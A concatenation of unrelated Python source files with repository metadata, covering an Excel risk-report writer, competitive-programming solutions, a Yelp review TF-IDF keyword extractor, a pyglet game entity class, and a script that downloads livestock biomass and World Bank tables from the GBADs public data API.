'A3', 'Unit for Outstanding: ',subtitle_1_color_format,'million dong',subtitle_1_format
)
summary_sheet.write('A4',subtitle_2,subtitle_2_format)
summary_sheet.write_row('A6',headers,headers_format)
summary_sheet.write('A7','Market Pressure < 10%',text_left_merge_format)
summary_sheet.write_rich_string('A8','10%<= Market Pressure',text_left_color_format,' <15%',text_left_format)
summary_sheet.write_rich_string('A9','15%<= Market Pressure',text_left_color_format,' <20%',text_left_format)
summary_sheet.write_rich_string('A10','20%<= Market Pressure',text_left_color_format,' <25%',text_left_format)
summary_sheet.write_rich_string('A11','25%<= Market Pressure',text_left_color_format,' <30%',text_left_format)
summary_sheet.write_rich_string('A12','30%<= Market Pressure',text_left_color_format,' <35%',text_left_format)
summary_sheet.write_rich_string('A13','35%<= Market Pressure',text_left_color_format,' <40%',text_left_format)
summary_sheet.write_rich_string('A14','40%<= Market Pressure',text_left_color_format,' <45%',text_left_format)
summary_sheet.write_rich_string('A15','45%<= Market Pressure',text_left_color_format,' <50%',text_left_format)
summary_sheet.write_rich_string('A16','50%<= Market Pressure',text_left_color_format,' <55%',text_left_format)
summary_sheet.write_rich_string('A17','55%<= Market Pressure',text_left_color_format,' <60%',text_left_format)
summary_sheet.write_rich_string('A18','60%<= Market Pressure',text_left_color_format,' <65%',text_left_format)
summary_sheet.write_rich_string('A19','65%<= Market Pressure',text_left_color_format,' <70%',text_left_format)
summary_sheet.write_rich_string('A20','70%<= Market Pressure',text_left_color_format,' <75%',text_left_format)
summary_sheet.write_rich_string('A21','75%<= Market Pressure',text_left_color_format,' <80%',text_left_format)
summary_sheet.write_rich_string('A22','Market Pressure',text_left_color_format,' >=80%', text_left_format)
summary_sheet.write_column('B7',summaryTable['AccountNumber'],num_right_format)
summary_sheet.write_column('D7',summaryTable['Proportion'],percent_format)
for loc, value in enumerate(summaryTable['Outstanding']):
if value > 100 or value == 0:
fmt = money_normal_format
else:
fmt = money_small_format
summary_sheet.write(f'C{loc+7}',value,fmt)
sum_row = summaryTable.shape[0] + 7
summary_sheet.write(f'A{sum_row}','Total',headers_format)
summary_sheet.write(f'B{sum_row}',summaryTable['AccountNumber'].sum(),sum_format)
summary_sheet.write(f'C{sum_row}',summaryTable['Outstanding'].sum(),sum_format)
summary_sheet.write(f'D{sum_row}','', sum_format)
###################################################
###################################################
###################################################
# Sheet Detail
sum_color_format = workbook.add_format(
{
'bold': True,
'align': 'right',
'valign': 'vbottom',
'font_size': 10,
'font_name': 'Times New Roman',
'num_format': '#,##0',
'color': '#FF0000'
}
)
sum_format = workbook.add_format(
{
'bold': True,
'align': 'right',
'valign': 'vbottom',
'font_size': 10,
'font_name': 'Times New Roman',
'num_format': '#,##0',
}
)
header_1_format = workbook.add_format(
{
'bold': True,
'text_wrap': True,
'border': 1,
'align': 'center',
'valign': 'vcenter',
'font_size': 10,
'font_name': 'Times New Roman',
'bg_color': '#FFC000'
}
)
header_2_format = workbook.add_format(
{
'bold': True,
'text_wrap': True,
'border': 1,
'align': 'center',
'valign': 'vcenter',
'font_size': 10,
'font_name': 'Times New Roman',
'bg_color': '#FFF2CC'
}
)
header_3_format = workbook.add_format(
{
'bold': True,
'text_wrap': True,
'border': 1,
'align': 'center',
'valign': 'vcenter',
'font_size': 10,
'font_name': 'Times New Roman',
'color': '#FF0000',
'bg_color': '#FFF2CC'
}
)
text_center_format = workbook.add_format(
{
'border': 1,
'align': 'center',
'valign': 'vcenter',
'font_size': 10,
'font_name': 'Times New Roman'
}
)
money_format = workbook.add_format(
{
'border':1,
'align': 'right',
'valign': 'vbottom',
'font_size': 10,
'font_name': 'Times New Roman',
'num_format': '_(* #,##0_);_(* (#,##0);_(* "-"??_);_(@_)'
}
)
percent_format = workbook.add_format(
{
'border': 1,
'align': 'right',
'valign': 'vbottom',
'font_size': 10,
'font_name': 'Times New Roman',
'num_format': '0.00'
}
)
headers_1 = [
'No.',
'Location',
'Custody',
'Original Loan',
'Interest',
'Total Loan',
]
headers_2 = [
'Total Cash & PIA (MR0062 có vay xuất cuối ngày làm việc)',
'Total Margin value (RMR0062)',
'Total Asset Value (RMR0015 with market price)'
]
headers_3 = [
'MMR (base on Marginable Asset)',
'MMR (base on Total Asset)'
]
detail_sheet = workbook.add_worksheet('Detail')
detail_sheet.set_column('A:A',6)
detail_sheet.set_column('B:B',12)
detail_sheet.set_column('C:C',17)
detail_sheet.set_column('D:F',19)
detail_sheet.set_column('G:J',18,options={'hidden':1})
detail_sheet.set_column('K:K',18)
detail_sheet.set_column('L:L',16)
detail_sheet.set_row(1,30)
detail_sheet.write('A1',detailTable.shape[0],sum_color_format)
detail_sheet.write('D1',detailTable['OriginalLoan'].sum(),sum_color_format)
detail_sheet.write('E1',detailTable['OriginalLoan'].sum()/10e6,sum_format)
detail_sheet.write_row('A2',headers_1,header_1_format)
detail_sheet.write_row('G2',headers_2,header_2_format)
detail_sheet.write_row('J2',headers_3,header_3_format)
detail_sheet.write('L2','Group/Deal',header_2_format)
detail_sheet.write_column('A3',detailTable['No.'],text_center_format)
detail_sheet.write_column('B3',detailTable['Location'],text_center_format)
detail_sheet.write_column('C3',detailTable['Custody'],text_center_format)
detail_sheet.write_column('D3',detailTable['OriginalLoan'],money_format)
detail_sheet.write_column('E3',detailTable['Interest'],money_format)
detail_sheet.write_column('F3',detailTable['TotalLoan'],money_format)
detail_sheet.write_column('G3',detailTable['CashAndPIA'],money_format)
detail_sheet.write_column('H3',detailTable['MarginValue'],money_format)
detail_sheet.write_column('I3',detailTable['TotalAssetValue'],money_format)
detail_sheet.write_column('J3',detailTable['MMRMA'],percent_format)
detail_sheet.write_column('K3',detailTable['MMRTA'],percent_format)
detail_sheet.write_column('L3',['']*detailTable.shape[0],money_format)
###########################################################################
###########################################################################
###########################################################################
writer.close()
if __name__=='__main__':
print(f"{__file__.split('/')[-1].replace('.py','')}::: Finished")
else:
print(f"{__name__.split('.')[-1]} ::: Finished")
print(f'Total Run Time ::: {np.round(time.time()-start,1)}s')
| TranHuyNam177/DataAnalytics-New | automation/risk_management/MarketPressureReport.py | MarketPressureReport.py | py | 20,420 | python | en | code | 0 | github-code | 50 |
7000527118 | #5와 6의 차이 2864
#https://www.acmicpc.net/problem/2864
hello = list(input().split())
min_result=[]
max_result=[]
for k in hello :
temp1 = ''
temp2 = ''
for i in k :
if i == '5' or i == '6':
temp1 += '5'
temp2 += '6'
else :
temp1 += i
temp2 += i
min_result.append(int(temp1))
max_result.append(int(temp2))
print(sum(min_result),sum(max_result)) | PangPangGod/Programmers_PY | BaekJoon_2864.py | BaekJoon_2864.py | py | 437 | python | en | code | 0 | github-code | 50 |
72665457116 |
import pandas as pd
import numpy as np
from ...librarys import env
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import ENGLISH_STOP_WORDS as esw
from . import base
class Reviews():
def load(self):
dataPath = env.getDataPath()
try:
reviews1 = pd.read_csv(dataPath+"yelp_dataset/newReviewAfterStopwords.csv")
reviews2 = pd.read_csv(dataPath+"yelp_dataset/newTipAfterStopwords.csv")
except:
return
# reviews.columns = reviews.iloc[0]
# new3 = reviews.drop(0)
# new3.reset_index(drop=True, inplace=True)
# new4 = new3.drop(['review_id', 'cool', 'useful', 'user_id', 'funny', 'date', 'stars'], axis=1)
# new5= new4.groupby('business_id').agg(lambda x: '&'.join(set(x))).reset_index()
frames = [reviews2, reviews1]
all = pd.concat(frames)
self.data =all.to_numpy().T[1:3].T
# print(self.data)
# print("哈哈",self.data.shape) : (4003,2)
items = {}
geoItems = {}
for i in range(len(self.data)):
if self.data[i][0] in items:
now = items[self.data[i][0]]
# print("哈哈")
items[self.data[i][0]] = ' '.join([str(now),str(self.data[i][1])])
else:
# print("完事2")
items[self.data[i][0]]=str(self.data[i][1])
# print("完事")
return items, geoItems
def full_process(self,data_to_process):
data_to_process=data_to_process.T
besinessID = data_to_process[0]
text = data_to_process[1]
words, weights = self._my_TF_IDF(text)
output=self._my_process_for_IFIDF(besinessID, words, weights)
return output
def _my_TF_IDF(self, text):
myStopWords = ['00','got','ll',
'going' ,'way', 'better', 'happy',
'said','bit',"awesome","excellent","better","sure",
'know' ,'say', 'work', 'wasn','want','day','live','roll','location','hound','perfect',
'time', 'restaurant', 'night', 'downtown','don', 'didn',
'delicious' ,'love' , 'amazing' , 'little',
'come','went','definitely','pretty','people','hour',
've','menu','try','nice','really','phoenix','came','wait','best','ordered','order', 'like','just','good','great','food','place', '00a', '66', '00am', '00pm', '01', '04', '050d_xior1npcuwkbivaq', '0530', '06', '0600', '0630',
'07','09', '10', '100', '1000', '105', '10a', '10am', '11', '110', '115', '11am', '11dollars', '11pm',
'12','did','make',
'120', '1230', '12oz', '12p', '12pm', '13', '15', '15a', '15ish', '16', '17', '18', '19', '1950',
'1hour', '1hr', '1hr1', '1ish', '1pm', '1st', '20', '200', '2007', '2008', '2009', '2010',
'2011',
'20min', '21', '22', '24', '25', '26', '27', '28', '2hr', '2nd', '2oz', '2pm', '2x', '30', '300',
'300th', '30am', '30ish', '30mins', '30p', '30pm', '30s', '31', '35', '35mins', '37', '38', '3d',
'3oz',
'3rd', '3secs', '40', '40a', '40mins', '45', '45a', '45am', '45min', '47', '48', '480', '4oz',
'4pm',
'4star', '4x', '50', '500', '50s', '51cents', '51st', '53', '55am', '5hrs', '5jzlbw7os2kcja',
'5th',
'60', '600', '630', '645am', '6am', '6oz', '6zwwyxzvspp83yplkggr5g', '730', '745', '75', '7am',
'7items',
'7th', '801', '815', '85', '8am', '90', '930', '945', '95', '97', '98', '99', '9am',
'_shdjvyidwqmo9lphwsrcg', 'aaaahing', 'aah']
myStopWords2 = ['05', '101', '10min', '128', '14', '15min', '15pm', '16th', '1800s', '1980', '1985', '1988',
'1red',
'2006', '2014', '2015', '2017', '2018', '23', '23rd', '29', '32', '3pm', '3x', '3year', '40th',
'42',
'44', '44oz', '44th', '45mins', '45pm', '49', '4b', '4th', '50pm', '55', '56th', '59', '5and',
'5pm',
'63', '65', '69', '72', '77', '80', '80s', '83', '845', '8pm', '8th', '90s', '9pm', '9th',
'_____',
'a1']
stopWords = myStopWords + list(myStopWords2) + list(esw)
vectorizer = TfidfVectorizer(min_df=1, stop_words=stopWords)
vectorizer.fit_transform(text)
words = vectorizer.get_feature_names()
weights = vectorizer.fit_transform(text).toarray()
words = np.array([words] * len(weights))
weights = np.array(weights)
return words, weights
def _my_process_for_IFIDF(self, besinessID, words, weights):
output = np.zeros((len(weights), 3), dtype=object)
output.T[0] = besinessID
for i in range(len(weights)):
now = np.zeros((2, len(weights[0])), dtype=object)
now[0] = words[i]
now[1] = weights[i]
now = now[:, (now[1] * -1).argsort()]
# outnowWords = now[0][:10].flatten().T
# outnowWeights = now[1][:10].flatten().T # 取前10 个
outnowWords = now[0][:30].flatten().T
outnowWeights = now[1][:30].flatten().T
output[i][1] = outnowWords
output[i][2] = outnowWeights
# return output.T[:2].T
return output
base.regObj(Reviews())
| tonystevenj/prosperity-adviser-fall2019 | DataVisualization/Server/models/data/reviews.py | reviews.py | py | 5,674 | python | en | code | 5 | github-code | 50 |
72262649754 | '''applib.model.entity -- generic model objects
'''
import re
import applib
import pyglet
from applib.engine import sprite
def _normalise(string):
'''Normalise the given string.
'''
string = string.strip().lower()
string = re.sub(r'\s+', '_', string)
string = re.sub(r'[^a-z_]', '', string)
return string
class Entity(object):
#: The asset group to which the entity class belongs.
group = None
#: The name of the entity class within its asset group.
name = None
#: The global index of all entity classes.
index = {}
def __init_subclass__(cls):
'''Create an `Entity` subclass.
'''
if cls.group is not None:
cls.group = _normalise(cls.group)
cls.index.setdefault(cls.group, {})
if cls.name is not None:
cls.name = _normalise(cls.name)
cls.index[cls.group][cls.name] = cls
def __init__(self, level):
'''Create an `Entity` object.
'''
self.level = level
if self.level is not None:
self.level.add_entity(self)
def destroy(self):
'''Remove the entity from its level.
'''
if self.level is not None:
self.level.remove_entity(self)
self.level = None
#: The texture used to render entities of this class.
_texture = None
@property
def texture(self):
if (self._texture is None) and (self.group is not None) and (self.name is not None):
type(self)._texture = pyglet.resource.texture(f'{self.group}/{self.name}.png')
return self._texture
#: The sprite used to render entities of this class (default value).
_sprite = None
@property
def sprite(self):
if (self._sprite is None) and (self.texture is not None):
self._sprite = sprite.EntitySprite(self.texture)
return self._sprite
def tick(self):
pass
| chardbury/paper-dragon-31 | applib/model/entity.py | entity.py | py | 1,937 | python | en | code | 1 | github-code | 50 |
553648911 | # Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def isCousins(self, root, x, y):
"""
In a binary tree, the root node is at depth 0, and children of each depth k node are at depth k+1.
Two nodes of a binary tree are cousins if they have the same depth, but have different parents.
We are given the root of a binary tree with unique values, and the values x and y of two different nodes in the tree.
Return true if and only if the nodes corresponding to the values x and y are cousins.
Example 1:
Input: root = [1,2,3,4], x = 4, y = 3
Output: false
Example 2:
Input: root = [1,2,3,null,4,null,5], x = 5, y = 4
Output: true
Example 3:
Input: root = [1,2,3,null,4], x = 2, y = 3
Output: false
Note:
The number of nodes in the tree will be between 2 and 100.
Each node has a unique integer value from 1 to 100.
:type root: TreeNode
:type x: int
:type y: int
:rtype: bool
"""
if not root:
return False
if x == y:
return False
node_dict = dict()
self.dfs(root, None, 0, node_dict)
lx, px = node_dict[x]
ly, py = node_dict[y]
return lx == ly and px != py
def dfs(self, root, pval, level, node_dict):
if not root.left and not root.right:
node_dict[root.val] = (level, pval)
return
node_dict[root.val] = (level, pval)
if root.left:
self.dfs(root.left, root.val, level + 1, node_dict)
if root.right:
self.dfs(root.right, root.val, level + 1, node_dict)
return
| ljia2/leetcode.py | solutions/tree/993.Cousins.in.Binary.Tree.py | 993.Cousins.in.Binary.Tree.py | py | 1,863 | python | en | code | 0 | github-code | 50 |
9653741486 | import pandas as pd
import numpy as np
import joblib
from pydantic import BaseModel
from sklearn.svm import SVC
from sklearn.feature_extraction.text import CountVectorizer
import re
import nltk
nltk.download('stopwords')
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
#class TweetText(BaseModel):
# tweet: str
class TweetModel:
def __init__(self):
self.df = pd.read_csv('twitter_new.csv', header=None, encoding='latin-1')
self.df = self.clean_prepare_dataset()
self.model_fname_ = 'twitter_sentiment_model.pkl'
try:
self.model = joblib.load(self.model_fname_)
except Exception as _:
self.model = self._train_model()
joblib.dump(self.model, self.model_fname_)
def clean_prepare_dataset(self):
self.df = self.df.loc[:, [0,5]]
self.df = self.df.rename(columns={0:"sentiment", 5:"text"})
df_text = self.df['text']
df_sentiment = self.df['sentiment']
self.df.insert(0, "text_new", df_text)
self.df.insert(1, "sentiment_new", df_sentiment)
self.df.drop(['sentiment','text'], axis=1, inplace=True)
self.df = self.df.rename(columns={"text_new":"text", "sentiment_new":"sentiment"})
return self.df
def filteredWord(self):
corpus = []
for i in range(0, len(self.df)):
tweet = ' '.join(re.sub("(@[A-Za-z0-9]+)|([^0-9A-Za-z \t])|(\w+:\/\/\S+)"," ",self.df['text'][i]).split())
tweet = tweet.lower()
tweet = tweet.split()
ps = PorterStemmer()
tweet = [ps.stem(word) for word in tweet if word not in set(stopwords.words('english'))]
tweet = ' '.join(tweet)
corpus.append(tweet)
return corpus
def _train_model(self):
#cv = CountVectorizer(max_features = 1500)
#X = cv.fit_transform(self.filteredWord()).toarray()
X = self.cvModel().transform(self.filteredWord()).toarray()
#print('shape of trainin model')
#print(X.shape)
y = self.df['sentiment']
svc = SVC(kernel='rbf')
model = svc.fit(X,y)
return model
def cvModel(self):
cv = CountVectorizer(max_features = 1500)
cvModel = cv.fit(self.filteredWord())
return cvModel
def predict_sentiment(self, tweet):
#tweet = tweet.split()
tweet_in = []
#tweet_in = ' '.join(tweet)
tweet_in.append(tweet)
print(tweet_in)
tweet_in = self.cvModel().transform(tweet_in).toarray()
#print(tweet_in.shape)
#tweet_in = tweet_in.reshape(len(tweet_in),1500)
print(tweet_in.shape)
prediction = self.model.predict(tweet_in)
print(prediction)
return prediction[0]
| alok449/twitter-sentiment-analysis | nlpmodel.py | nlpmodel.py | py | 2,867 | python | en | code | 0 | github-code | 50 |
15673482668 | #%% About
'''
We will prefer to get data from the Informatics team API.
For documentation see http://gbadske.org:9000/dataportal/
'''
#%% Packages and functions
import requests as req # For sending HTTP requests
import inspect
import io
import pandas as pd
# To clean up column names in a dataframe
def cleancolnames(INPUT_DF):
# Comments inside the statement create errors. Putting all comments at the top.
# Convert to lowercase
# Strip leading and trailing spaces, then replace spaces with underscore
# Replace slashes, parenthesis, and brackets with underscore
# Replace some special characters with underscore
# Replace other special characters with words
INPUT_DF.columns = INPUT_DF.columns.str.lower() \
.str.strip().str.replace(' ' ,'_' ,regex=False) \
.str.replace('/' ,'_' ,regex=False).str.replace('\\' ,'_' ,regex=False) \
.str.replace('(' ,'_' ,regex=False).str.replace(')' ,'_' ,regex=False) \
.str.replace('[' ,'_' ,regex=False).str.replace(']' ,'_' ,regex=False) \
.str.replace('{' ,'_' ,regex=False).str.replace('}' ,'_' ,regex=False) \
.str.replace('!' ,'_' ,regex=False).str.replace('?' ,'_' ,regex=False) \
.str.replace('-' ,'_' ,regex=False).str.replace('+' ,'_' ,regex=False) \
.str.replace('^' ,'_' ,regex=False).str.replace('*' ,'_' ,regex=False) \
.str.replace('.' ,'_' ,regex=False).str.replace(',' ,'_' ,regex=False) \
.str.replace('|' ,'_' ,regex=False).str.replace('#' ,'_' ,regex=False) \
.str.replace('>' ,'_gt_' ,regex=False) \
.str.replace('<' ,'_lt_' ,regex=False) \
.str.replace('=' ,'_eq_' ,regex=False) \
.str.replace('@' ,'_at_' ,regex=False) \
.str.replace('$' ,'_dol_' ,regex=False) \
.str.replace('%' ,'_pct_' ,regex=False) \
.str.replace('&' ,'_and_' ,regex=False)
return None
# To print df.info() with header for readability, and optionally write data info to text file
def datainfo(
INPUT_DF
,OUTFOLDER=None # String (opt): folder to output {dataname}_info.txt. If None, no file will be created.
):
funcname = inspect.currentframe().f_code.co_name
dataname = [x for x in globals() if globals()[x] is INPUT_DF][0]
rowcount = INPUT_DF.shape[0]
colcount = INPUT_DF.shape[1]
idxcols = str(list(INPUT_DF.index.names))
header = f"Data name: {dataname :>26s}\nRows: {rowcount :>26,}\nColumns: {colcount :>26,}\nIndex: {idxcols :>26s}\n"
divider = ('-'*26) + ('-'*11) + '\n'
bigdivider = ('='*26) + ('='*11) + '\n'
print(bigdivider + header + divider)
INPUT_DF.info()
print(divider + f"End: {dataname:>26s}\n" + bigdivider)
if OUTFOLDER: # If something has been passed to OUTFOLDER parameter
filename = f"{dataname}_info"
print(f"\n<{funcname}> Creating file {OUTFOLDER}\{filename}.txt")
datetimestamp = 'Created on ' + time.strftime('%Y-%m-%d %X', time.gmtime()) + ' UTC' + '\n'
buffer = io.StringIO()
INPUT_DF.info(buf=buffer, max_cols=colcount)
filecontents = header + divider + datetimestamp + buffer.getvalue()
tofile = os.path.join(OUTFOLDER, f"{filename}.txt")
with open(tofile, 'w', encoding='utf-8') as f: f.write(filecontents)
print(f"<{funcname}> ...done.")
return None
#%% View tables and field names
# =============================================================================
#### Get list of all available tables
# =============================================================================
gbadske_tablelist_uri = 'http://gbadske.org:9000/GBADsTables/public?format=text'
gbadske_tablelist = req.get(gbadske_tablelist_uri).text.split(',') # Get table list and convert to list
# ----------------------------------------------------------------------------
# Lookup the column names in a specific table
# ----------------------------------------------------------------------------
gbadske_fieldnames_uri = 'http://gbadske.org:9000/GBADsTable/public'
# Return the column names for a table
# Usage: table_columns = gbadske_get_column_names(table)
def gbadske_get_column_names(
TABLE_NAME # String: name of table
,RESP_TYPE='list' # String: 'list' returns a list, 'string' returns a string
):
fieldnames_params = {
'table_name':TABLE_NAME
,'format':'text'
}
fieldnames_str = req.get(gbadske_fieldnames_uri , params=fieldnames_params).text
fieldnames_list = req.get(gbadske_fieldnames_uri , params=fieldnames_params).text.split(',')
if RESP_TYPE == 'list':
return fieldnames_list
elif RESP_TYPE == 'string':
return fieldnames_str
#%% Retrieve a table
gbadske_query_uri = 'http://gbadske.org:9000/GBADsPublicQuery/'
# -----------------------------------------------------------------------------
# Pieces
# -----------------------------------------------------------------------------
# gbadske_query_table_name = 'livestock_countries_biomass'
# gbadske_query_params = {
# 'fields':gbadske_get_column_names(gbadske_query_table_name ,'string') # All columns in table
# ,'query':"year=2017 AND member_country='Australia'" # Note character column value must be in SINGLE QUOTES (double quotes don't work)
# ,'format':'file'
# }
# gbadske_query_resp = req.get(gbadske_query_uri + gbadske_query_table_name , params=gbadske_query_params)
# # Read table into pandas dataframe
# gbadske_query_df = pd.read_csv(io.StringIO(gbadske_query_resp.text))
# -----------------------------------------------------------------------------
# Function
# -----------------------------------------------------------------------------
# Return a table as a pandas dataframe
# Usage: table_df = gbadske_import_to_pandas(tablename)
def gbadske_import_to_pandas(
TABLE_NAME # String: name of table
,QUERY="" # String (optional): data query in DOUBLE QUOTES. Values for character columns value must be in SINGLE QUOTES e.g. QUERY="year=2017 AND member_country='Australia'".
):
funcname = inspect.currentframe().f_code.co_name
query_params = {
'fields':gbadske_get_column_names(TABLE_NAME ,'string')
,'query':QUERY
,'format':'file'
}
query_resp = req.get(gbadske_query_uri + TABLE_NAME , params=query_params)
if query_resp.status_code == 200:
query_df = pd.read_csv(io.StringIO(query_resp.text)) # Read table into pandas dataframe
else:
print(f'<{funcname}> HTTP query error.')
query_df = pd.DataFrame()
return query_df
#%% Get tables needed for AHLE
get_years = range(2000 ,2022)
# =============================================================================
#### livestock_countries_biomass
# 2022-8-4: Guelph says this is the correct table to use
# =============================================================================
# Get data for range of years
livestock_countries_biomass_cols = gbadske_get_column_names('livestock_countries_biomass')
livestock_countries_biomass = pd.DataFrame() # Initialize
for i in get_years:
single_year = gbadske_import_to_pandas('livestock_countries_biomass' ,QUERY=f"year={i}")
livestock_countries_biomass = pd.concat([livestock_countries_biomass ,single_year] ,ignore_index=True)
# -----------------------------------------------------------------------------
# Cleanup
# -----------------------------------------------------------------------------
# Change columns to numeric
convert_cols_to_numeric = ['year' ,'population' ,'biomass']
for COL in convert_cols_to_numeric:
livestock_countries_biomass[COL] = pd.to_numeric(livestock_countries_biomass[COL] ,errors='coerce') # Use to_numeric to handle remaining values like ':'
# For Ducks, liveweight is in grams. Change to kg.
_row_selection = (livestock_countries_biomass['species'].str.upper() == 'DUCKS') & (livestock_countries_biomass['liveweight'] > 1000)
print(f"> Selected {_row_selection.sum(): ,} rows.")
livestock_countries_biomass.loc[_row_selection ,'liveweight'] = livestock_countries_biomass.loc[_row_selection ,'liveweight'] / 1000
# Recalculate biomass as population * liveweight
livestock_countries_biomass.loc[_row_selection ,'biomass'] = \
livestock_countries_biomass.loc[_row_selection ,'liveweight'] * livestock_countries_biomass.loc[_row_selection ,'population']
# Remove duplicates (country-species-year combinations that appear twice)
csy_counts = livestock_countries_biomass[['country' ,'species' ,'year']].value_counts()
biomass_countries = list(livestock_countries_biomass['country'].unique())
livestock_countries_biomass = livestock_countries_biomass.drop_duplicates(
subset=['country' ,'species' ,'year'] # List (opt): only consider these columns when identifying duplicates. If None, consider all columns.
,keep='first' # String: which occurrence to keep, 'first' or 'last'
)
datainfo(livestock_countries_biomass)
lcb_years = livestock_countries_biomass['year'].value_counts()
# Profile
# profile = livestock_countries_biomass.profile_report()
# profile.to_file(os.path.join(RAWDATA_FOLDER ,'livestock_countries_biomass_profile.html'))
# Export
livestock_countries_biomass.to_csv(os.path.join(RAWDATA_FOLDER ,'livestock_countries_biomass.csv') ,index=False)
livestock_countries_biomass.to_pickle(os.path.join(PRODATA_FOLDER ,'livestock_countries_biomass.pkl.gz'))
# =============================================================================
#### livestock_countries_biomass_oie
# 2023-1-9: Liverpool wants to use the WOAH/OIE biomass numbers
# =============================================================================
# Get data for range of years
livestock_countries_biomass_oie_cols = gbadske_get_column_names('livestock_countries_biomass_oie')
livestock_countries_biomass_oie = pd.DataFrame() # Initialize
for i in get_years:
single_year = gbadske_import_to_pandas('livestock_countries_biomass_oie' ,QUERY=f"year={i}")
livestock_countries_biomass_oie = pd.concat([livestock_countries_biomass_oie ,single_year] ,ignore_index=True)
lcbo_years = livestock_countries_biomass_oie['year'].value_counts()
# =============================================================================
#### biomass_oie
# 2023-1-9: Liverpool wants to use the WOAH/OIE biomass numbers
# =============================================================================
# Get data for range of years
biomass_oie_cols = gbadske_get_column_names('biomass_oie')
biomass_oie = pd.DataFrame() # Initialize
for i in get_years:
single_year = gbadske_import_to_pandas('biomass_oie' ,QUERY=f"year={i}")
biomass_oie = pd.concat([biomass_oie ,single_year] ,ignore_index=True)
bo_years = biomass_oie['year'].value_counts()
# Describe frequency of sources by year
bo_sources = biomass_oie[['animal_category', 'year', 'source_data']].value_counts()
# =============================================================================
#### biomass_live_weight_fao
# This update to the biomass data has been downloaded from an Informatics team
# repository containing data that has not yet been added to the public API.
# https://github.com/GBADsInformatics/PPSTheme
# =============================================================================
biomass_live_weight_fao = pd.read_csv(os.path.join(RAWDATA_FOLDER ,'20230116_biomass_live_weight_fao.csv'))
biomass_live_weight_fao = biomass_live_weight_fao.rename(columns={"country_x":"country" ,"live_weight":"liveweight"})
# Limit to same years as other tables
biomass_live_weight_fao = biomass_live_weight_fao.loc[biomass_live_weight_fao['year'].isin(get_years)]
datainfo(biomass_live_weight_fao)
# Compare to livestock_countries_biomass
check_lcb_vs_blw = pd.merge(
left=livestock_countries_biomass
,right=biomass_live_weight_fao
,on=['iso3' ,'species' ,'year']
,how='outer'
,indicator=True
)
datainfo(check_lcb_vs_blw)
check_lcb_vs_blw['_merge'].value_counts()
check_lcb_vs_blw_specyear = check_lcb_vs_blw.pivot_table(
index=['species' ,'year']
,values=['biomass_x' ,'biomass_y']
,aggfunc=['count' ,'sum']
)
# Export
biomass_live_weight_fao.to_csv(os.path.join(RAWDATA_FOLDER ,'biomass_live_weight_fao.csv') ,index=False)
biomass_live_weight_fao.to_pickle(os.path.join(PRODATA_FOLDER ,'biomass_live_weight_fao.pkl.gz'))
# =============================================================================
#### livestock_national_population_biomass_faostat
# 2022-8-4: Guelph says this is out of date
# =============================================================================
# Get data for range of years
# biomass_faostat_cols = gbadske_get_column_names('livestock_national_population_biomass_faostat')
# biomass_faostat = pd.DataFrame() # Initialize
# for i in get_years:
# single_year = gbadske_import_to_pandas('livestock_national_population_biomass_faostat' ,QUERY=f"year={i}")
# biomass_faostat = pd.concat([biomass_faostat ,single_year] ,ignore_index=True)
# Profile
# profile = biomass_faostat.profile_report()
# profile.to_file(os.path.join(RAWDATA_FOLDER ,'biomass_faostat_profile.html'))
# Export
# biomass_faostat.to_csv(os.path.join(RAWDATA_FOLDER ,'livestock_national_population_biomass_faostat.csv') ,index=False)
# biomass_faostat.to_pickle(os.path.join(PRODATA_FOLDER ,'biomass_faostat.pkl.gz'))
# =============================================================================
#### World Bank
# =============================================================================
wb_income = pd.DataFrame() # Initialize
for i in get_years:
single_year = gbadske_import_to_pandas('countries_incomegroups_worldbank' ,QUERY=f"year={i}")
wb_income = pd.concat([wb_income ,single_year] ,ignore_index=True)
datainfo(wb_income)
wb_region = gbadske_import_to_pandas('regions_worldbank')
datainfo(wb_region)
# Export
wb_income.to_csv(os.path.join(RAWDATA_FOLDER ,'wb_income.csv') ,index=False)
wb_income.to_pickle(os.path.join(PRODATA_FOLDER ,'wb_income.pkl.gz'))
wb_region.to_csv(os.path.join(RAWDATA_FOLDER ,'wb_region.csv') ,index=False)
wb_region.to_pickle(os.path.join(PRODATA_FOLDER ,'wb_region.pkl.gz'))
# =============================================================================
#### Geo codes
# =============================================================================
un_geo_codes = gbadske_import_to_pandas('un_geo_codes')
datainfo(un_geo_codes)
# Export
un_geo_codes.to_csv(os.path.join(RAWDATA_FOLDER ,'un_geo_codes.csv') ,index=False)
un_geo_codes.to_pickle(os.path.join(PRODATA_FOLDER ,'un_geo_codes.pkl.gz'))
# =============================================================================
#### countries_adminunits_iso
# =============================================================================
# check_admin = gbadske_import_to_pandas('countries_adminunits_iso')
gbadske_query_table_name = 'countries_adminunits_iso'
gbadske_query_params = {
'fields':gbadske_get_column_names(gbadske_query_table_name ,'string') # All columns in table
,'query':"" # Note character column value must be in SINGLE QUOTES (double quotes don't work)
,'format':'file'
}
gbadske_query_resp = req.get(gbadske_query_uri + gbadske_query_table_name , params=gbadske_query_params)
# =============================================================================
#### Check others
# =============================================================================
# check_faoprod = gbadske_import_to_pandas('livestock_production_faostat' ,"year=2019")
# check_faoprodanimals = gbadske_import_to_pandas('prodanimals_national_faostat' ,"year=2019")
# check_idtable = gbadske_import_to_pandas('idtable')
# check_country_info = gbadske_import_to_pandas('country_info')
#%% Create summaries
# =============================================================================
#### Write table list to Excel
# =============================================================================
# timerstart('Table and column lists')
# with pd.ExcelWriter(os.path.join(RAWDATA_FOLDER ,'gbadske_tables_20220801.xlsx')) as writer:
# # First sheet: table list
# gbadske_tablelist_df = pd.DataFrame({'table_name':gbadske_tablelist})
# gbadske_tablelist_df.to_excel(writer ,sheet_name='Table List' ,index=False)
# # Subsequent sheets: column list for each table
# for table in gbadske_tablelist:
# print(f'> Processing table {table}')
# collist = gbadske_get_column_names(table)
# collist_df = pd.DataFrame({'column_name':collist})
# sheetname = table.replace('population' ,'pop')
# sheetname_short = sheetname[0:31] # Sheet name must be <= 31 characters
# collist_df.to_excel(writer, sheet_name=sheetname_short ,index=False)
# del collist ,collist_df
# timerstop()
# =============================================================================
#### Write sample of each table to Excel
#!!! Run time 3 hours!!
# When run without a table query (e.g. year=2018), the gbadske API takes a long time to respond
# =============================================================================
# timerstart('Sample of rows from each table')
# with pd.ExcelWriter(os.path.join(RAWDATA_FOLDER ,'gbadske_tables_100rows_20220801.xlsx')) as writer:
